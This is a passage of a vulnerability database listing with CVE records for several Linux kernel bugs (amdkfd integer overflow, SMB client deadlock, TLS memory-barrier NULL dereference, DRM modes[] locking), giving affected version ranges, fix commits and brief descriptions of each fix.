          "programFiles": [
            "drivers/gpu/drm/amd/amdkfd/kfd_chardev.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.19"
            },
            {
              "lessThan": "3.19",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.19",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\namdkfd: use calloc instead of kzalloc to avoid integer overflow\n\nThis uses calloc instead of doing the multiplication which might\noverflow."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-16T08:02:32.138Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/e6721ea845fcb93a764a92bd40f1afc0d6c69751"
        },
        {
          "url": "https://git.kernel.org/stable/c/8b0564704255c6b3c6a7188e86939f754e1577c0"
        },
        {
          "url": "https://git.kernel.org/stable/c/fcbd99b3c73309107e3be71f20dff9414df64f91"
        },
        {
          "url": "https://git.kernel.org/stable/c/cbac7de1d9901521e78cdc34e15451df3611f2ad"
        },
        {
          "url": "https://git.kernel.org/stable/c/e6768c6737f4c02cba193a3339f0cc2907f0b86a"
        },
        {
          "url": "https://git.kernel.org/stable/c/315eb3c2df7e4cb18e3eacfa18a53a46f2bf0ef7"
        },
        {
          "url": "https://git.kernel.org/stable/c/0c33d11153949310d76631d8f4a4736519eacd3a"
        },
        {
          "url": "https://git.kernel.org/stable/c/3b0daecfeac0103aba8b293df07a0cbaf8b43f29"
        }
      ],
      "title": "amdkfd: use calloc instead of kzalloc to avoid integer overflow",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26817",
    "datePublished": "2024-04-13T11:17:08.764Z",
    "dateReserved": "2024-02-19T14:20:24.180Z",
    "dateUpdated": "2025-11-04T18:29:59.654Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-39468 (GCVE-0-2024-39468)

Vulnerability from cvelistv5 – Published: 2024-06-25 14:28 – Updated: 2025-05-21 09:12

Title

smb: client: fix deadlock in smb2_find_smb_tcon()

Summary

In the Linux kernel, the following vulnerability has been resolved: smb: client: fix deadlock in smb2_find_smb_tcon() Unlock cifs_tcp_ses_lock before calling cifs_put_smb_ses() to avoid such deadlock.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b055752675cd1d1db…
	https://git.kernel.org/stable/c/21f5dd36e655d25a7…
	https://git.kernel.org/stable/c/b09b556e489683178…
	https://git.kernel.org/stable/c/225de871ddf994f69…
	https://git.kernel.org/stable/c/8d0f5f1ccf675454a…
	https://git.kernel.org/stable/c/02c418774f76a0a36…

Impacted products

Vendor

Product

Version

Linux

Affected: 78ebec450ef4f0720c592638d92bad679d75d7ce , < b055752675cd1d1db4ac9c2750db3dc3e89ea261 (git)
Affected: e695a9ad0305af6e8b0cbc24a54976ac2120cbb3 , < 21f5dd36e655d25a7b45b61c1e537198b671f720 (git)
Affected: e695a9ad0305af6e8b0cbc24a54976ac2120cbb3 , < b09b556e48968317887a11243a5331a7bc00ece5 (git)
Affected: e695a9ad0305af6e8b0cbc24a54976ac2120cbb3 , < 225de871ddf994f69a57f035709cad9c0ab8615a (git)
Affected: e695a9ad0305af6e8b0cbc24a54976ac2120cbb3 , < 8d0f5f1ccf675454a833a573c53830a49b7d1a47 (git)
Affected: e695a9ad0305af6e8b0cbc24a54976ac2120cbb3 , < 02c418774f76a0a36a6195c9dbf8971eb4130a15 (git)

Linux

Affected: 5.14
Unaffected: 0 , < 5.14 (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.94 , ≤ 6.1.* (semver)
Unaffected: 6.6.34 , ≤ 6.6.* (semver)
Unaffected: 6.9.5 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:26:15.555Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b055752675cd1d1db4ac9c2750db3dc3e89ea261"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/21f5dd36e655d25a7b45b61c1e537198b671f720"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b09b556e48968317887a11243a5331a7bc00ece5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/225de871ddf994f69a57f035709cad9c0ab8615a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8d0f5f1ccf675454a833a573c53830a49b7d1a47"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/02c418774f76a0a36a6195c9dbf8971eb4130a15"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39468",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:07:58.449670Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:41.922Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/smb2transport.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b055752675cd1d1db4ac9c2750db3dc3e89ea261",
              "status": "affected",
              "version": "78ebec450ef4f0720c592638d92bad679d75d7ce",
              "versionType": "git"
            },
            {
              "lessThan": "21f5dd36e655d25a7b45b61c1e537198b671f720",
              "status": "affected",
              "version": "e695a9ad0305af6e8b0cbc24a54976ac2120cbb3",
              "versionType": "git"
            },
            {
              "lessThan": "b09b556e48968317887a11243a5331a7bc00ece5",
              "status": "affected",
              "version": "e695a9ad0305af6e8b0cbc24a54976ac2120cbb3",
              "versionType": "git"
            },
            {
              "lessThan": "225de871ddf994f69a57f035709cad9c0ab8615a",
              "status": "affected",
              "version": "e695a9ad0305af6e8b0cbc24a54976ac2120cbb3",
              "versionType": "git"
            },
            {
              "lessThan": "8d0f5f1ccf675454a833a573c53830a49b7d1a47",
              "status": "affected",
              "version": "e695a9ad0305af6e8b0cbc24a54976ac2120cbb3",
              "versionType": "git"
            },
            {
              "lessThan": "02c418774f76a0a36a6195c9dbf8971eb4130a15",
              "status": "affected",
              "version": "e695a9ad0305af6e8b0cbc24a54976ac2120cbb3",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/smb/client/smb2transport.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.14"
            },
            {
              "lessThan": "5.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.94",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.34",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.94",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.34",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.5",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix deadlock in smb2_find_smb_tcon()\n\nUnlock cifs_tcp_ses_lock before calling cifs_put_smb_ses() to avoid such\ndeadlock."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-21T09:12:44.610Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b055752675cd1d1db4ac9c2750db3dc3e89ea261"
        },
        {
          "url": "https://git.kernel.org/stable/c/21f5dd36e655d25a7b45b61c1e537198b671f720"
        },
        {
          "url": "https://git.kernel.org/stable/c/b09b556e48968317887a11243a5331a7bc00ece5"
        },
        {
          "url": "https://git.kernel.org/stable/c/225de871ddf994f69a57f035709cad9c0ab8615a"
        },
        {
          "url": "https://git.kernel.org/stable/c/8d0f5f1ccf675454a833a573c53830a49b7d1a47"
        },
        {
          "url": "https://git.kernel.org/stable/c/02c418774f76a0a36a6195c9dbf8971eb4130a15"
        }
      ],
      "title": "smb: client: fix deadlock in smb2_find_smb_tcon()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39468",
    "datePublished": "2024-06-25T14:28:54.897Z",
    "dateReserved": "2024-06-25T14:23:23.744Z",
    "dateUpdated": "2025-05-21T09:12:44.610Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-36489 (GCVE-0-2024-36489)

Vulnerability from cvelistv5 – Published: 2024-06-21 10:18 – Updated: 2025-05-04 09:11

Title

tls: fix missing memory barrier in tls_init

Summary

In the Linux kernel, the following vulnerability has been resolved: tls: fix missing memory barrier in tls_init In tls_init(), a write memory barrier is missing, and store-store reordering may cause NULL dereference in tls_{setsockopt,getsockopt}. CPU0 CPU1 ----- ----- // In tls_init() // In tls_ctx_create() ctx = kzalloc() ctx->sk_proto = READ_ONCE(sk->sk_prot) -(1) // In update_sk_prot() WRITE_ONCE(sk->sk_prot, tls_prots) -(2) // In sock_common_setsockopt() READ_ONCE(sk->sk_prot)->setsockopt() // In tls_{setsockopt,getsockopt}() ctx->sk_proto->setsockopt() -(3) In the above scenario, when (1) and (2) are reordered, (3) can observe the NULL value of ctx->sk_proto, causing NULL dereference. To fix it, we rely on rcu_assign_pointer() which implies the release barrier semantic. By moving rcu_assign_pointer() after ctx->sk_proto is initialized, we can ensure that ctx->sk_proto are visible when changing sk->sk_prot.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d72e126e9a36d3d33…
	https://git.kernel.org/stable/c/2c260a24cf1c4d30e…
	https://git.kernel.org/stable/c/335c8f1566d8e44c3…
	https://git.kernel.org/stable/c/ab67c2fd3d070a219…
	https://git.kernel.org/stable/c/ef21007a7b581c7fe…
	https://git.kernel.org/stable/c/91e61dd7a0af66040…

Impacted products

Vendor

Product

Version

Linux

Affected: d5bee7374b68de3c44586d46e9e61ffc97a1e886 , < d72e126e9a36d3d33889829df8fc90100bb0e071 (git)
Affected: d5bee7374b68de3c44586d46e9e61ffc97a1e886 , < 2c260a24cf1c4d30ea3646124f766ee46169280b (git)
Affected: d5bee7374b68de3c44586d46e9e61ffc97a1e886 , < 335c8f1566d8e44c384d16b450a18554896d4e8b (git)
Affected: d5bee7374b68de3c44586d46e9e61ffc97a1e886 , < ab67c2fd3d070a21914d0c31319d3858ab4e199c (git)
Affected: d5bee7374b68de3c44586d46e9e61ffc97a1e886 , < ef21007a7b581c7fe64d5a10c320880a033c837b (git)
Affected: d5bee7374b68de3c44586d46e9e61ffc97a1e886 , < 91e61dd7a0af660408e87372d8330ceb218be302 (git)

Linux

Affected: 5.7
Unaffected: 0 , < 5.7 (semver)
Unaffected: 5.10.219 , ≤ 5.10.* (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.9.4 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:37:05.240Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d72e126e9a36d3d33889829df8fc90100bb0e071"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2c260a24cf1c4d30ea3646124f766ee46169280b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/335c8f1566d8e44c384d16b450a18554896d4e8b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ab67c2fd3d070a21914d0c31319d3858ab4e199c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ef21007a7b581c7fe64d5a10c320880a033c837b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/91e61dd7a0af660408e87372d8330ceb218be302"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36489",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T17:09:28.291219Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:45.616Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/tls/tls_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d72e126e9a36d3d33889829df8fc90100bb0e071",
              "status": "affected",
              "version": "d5bee7374b68de3c44586d46e9e61ffc97a1e886",
              "versionType": "git"
            },
            {
              "lessThan": "2c260a24cf1c4d30ea3646124f766ee46169280b",
              "status": "affected",
              "version": "d5bee7374b68de3c44586d46e9e61ffc97a1e886",
              "versionType": "git"
            },
            {
              "lessThan": "335c8f1566d8e44c384d16b450a18554896d4e8b",
              "status": "affected",
              "version": "d5bee7374b68de3c44586d46e9e61ffc97a1e886",
              "versionType": "git"
            },
            {
              "lessThan": "ab67c2fd3d070a21914d0c31319d3858ab4e199c",
              "status": "affected",
              "version": "d5bee7374b68de3c44586d46e9e61ffc97a1e886",
              "versionType": "git"
            },
            {
              "lessThan": "ef21007a7b581c7fe64d5a10c320880a033c837b",
              "status": "affected",
              "version": "d5bee7374b68de3c44586d46e9e61ffc97a1e886",
              "versionType": "git"
            },
            {
              "lessThan": "91e61dd7a0af660408e87372d8330ceb218be302",
              "status": "affected",
              "version": "d5bee7374b68de3c44586d46e9e61ffc97a1e886",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/tls/tls_main.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.7"
            },
            {
              "lessThan": "5.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.219",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.219",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntls: fix missing memory barrier in tls_init\n\nIn tls_init(), a write memory barrier is missing, and store-store\nreordering may cause NULL dereference in tls_{setsockopt,getsockopt}.\n\nCPU0                               CPU1\n-----                              -----\n// In tls_init()\n// In tls_ctx_create()\nctx = kzalloc()\nctx-\u003esk_proto = READ_ONCE(sk-\u003esk_prot) -(1)\n\n// In update_sk_prot()\nWRITE_ONCE(sk-\u003esk_prot, tls_prots)     -(2)\n\n                                   // In sock_common_setsockopt()\n                                   READ_ONCE(sk-\u003esk_prot)-\u003esetsockopt()\n\n                                   // In tls_{setsockopt,getsockopt}()\n                                   ctx-\u003esk_proto-\u003esetsockopt()    -(3)\n\nIn the above scenario, when (1) and (2) are reordered, (3) can observe\nthe NULL value of ctx-\u003esk_proto, causing NULL dereference.\n\nTo fix it, we rely on rcu_assign_pointer() which implies the release\nbarrier semantic. By moving rcu_assign_pointer() after ctx-\u003esk_proto is\ninitialized, we can ensure that ctx-\u003esk_proto are visible when\nchanging sk-\u003esk_prot."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:11:17.796Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d72e126e9a36d3d33889829df8fc90100bb0e071"
        },
        {
          "url": "https://git.kernel.org/stable/c/2c260a24cf1c4d30ea3646124f766ee46169280b"
        },
        {
          "url": "https://git.kernel.org/stable/c/335c8f1566d8e44c384d16b450a18554896d4e8b"
        },
        {
          "url": "https://git.kernel.org/stable/c/ab67c2fd3d070a21914d0c31319d3858ab4e199c"
        },
        {
          "url": "https://git.kernel.org/stable/c/ef21007a7b581c7fe64d5a10c320880a033c837b"
        },
        {
          "url": "https://git.kernel.org/stable/c/91e61dd7a0af660408e87372d8330ceb218be302"
        }
      ],
      "title": "tls: fix missing memory barrier in tls_init",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36489",
    "datePublished": "2024-06-21T10:18:10.327Z",
    "dateReserved": "2024-06-21T10:12:11.459Z",
    "dateUpdated": "2025-05-04T09:11:17.796Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35950 (GCVE-0-2024-35950)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:41 – Updated: 2026-01-05 10:36

Title

drm/client: Fully protect modes[] with dev->mode_config.mutex

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/client: Fully protect modes[] with dev->mode_config.mutex The modes[] array contains pointers to modes on the connectors' mode lists, which are protected by dev->mode_config.mutex. Thus we need to extend modes[] the same protection or by the time we use it the elements may already be pointing to freed/reused memory.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/5a2f957e3c4553bbb…
	https://git.kernel.org/stable/c/41586487769eede64…
	https://git.kernel.org/stable/c/d2dc6600d4e3e1453…
	https://git.kernel.org/stable/c/18c8cc6680ce938d0…
	https://git.kernel.org/stable/c/04e018bd913d3d333…
	https://git.kernel.org/stable/c/8ceb873d816786a7c…
	https://git.kernel.org/stable/c/3eadd887dbac1df8f…

Impacted products

Vendor

Product

Version

Linux

Affected: e13a058310509b22b2b45cbdd82d8797e173c3db , < 5a2f957e3c4553bbb100504a1acfeaeb33f4ca4e (git)
Affected: e13a058310509b22b2b45cbdd82d8797e173c3db , < 41586487769eede64ab1aa6c65c74cbf76c12ef0 (git)
Affected: e13a058310509b22b2b45cbdd82d8797e173c3db , < d2dc6600d4e3e1453e3b1fb233e9f97e2a1ae949 (git)
Affected: e13a058310509b22b2b45cbdd82d8797e173c3db , < 18c8cc6680ce938d0458859b6a08b4d34f7d8055 (git)
Affected: e13a058310509b22b2b45cbdd82d8797e173c3db , < 04e018bd913d3d3336ab7d21c2ad31a9175fe984 (git)
Affected: e13a058310509b22b2b45cbdd82d8797e173c3db , < 8ceb873d816786a7c8058f50d903574aff8d3764 (git)
Affected: e13a058310509b22b2b45cbdd82d8797e173c3db , < 3eadd887dbac1df8f25f701e5d404d1b90fd0fea (git)

Linux

Affected: 4.14
Unaffected: 0 , < 4.14 (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.156 , ≤ 5.15.* (semver)
Unaffected: 6.1.87 , ≤ 6.1.* (semver)
Unaffected: 6.6.28 , ≤ 6.6.* (semver)
Unaffected: 6.8.7 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35950",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T15:10:23.377799Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:33:42.136Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.192Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5a2f957e3c4553bbb100504a1acfeaeb33f4ca4e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/41586487769eede64ab1aa6c65c74cbf76c12ef0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d2dc6600d4e3e1453e3b1fb233e9f97e2a1ae949"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/18c8cc6680ce938d0458859b6a08b4d34f7d8055"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/04e018bd913d3d3336ab7d21c2ad31a9175fe984"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8ceb873d816786a7c8058f50d903574aff8d3764"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3eadd887dbac1df8f25f701e5d404d1b90fd0fea"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/drm_client_modeset.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5a2f957e3c4553bbb100504a1acfeaeb33f4ca4e",
              "status": "affected",
              "version": "e13a058310509b22b2b45cbdd82d8797e173c3db",
              "versionType": "git"
            },
            {
              "lessThan": "41586487769eede64ab1aa6c65c74cbf76c12ef0",
              "status": "affected",
              "version": "e13a058310509b22b2b45cbdd82d8797e173c3db",
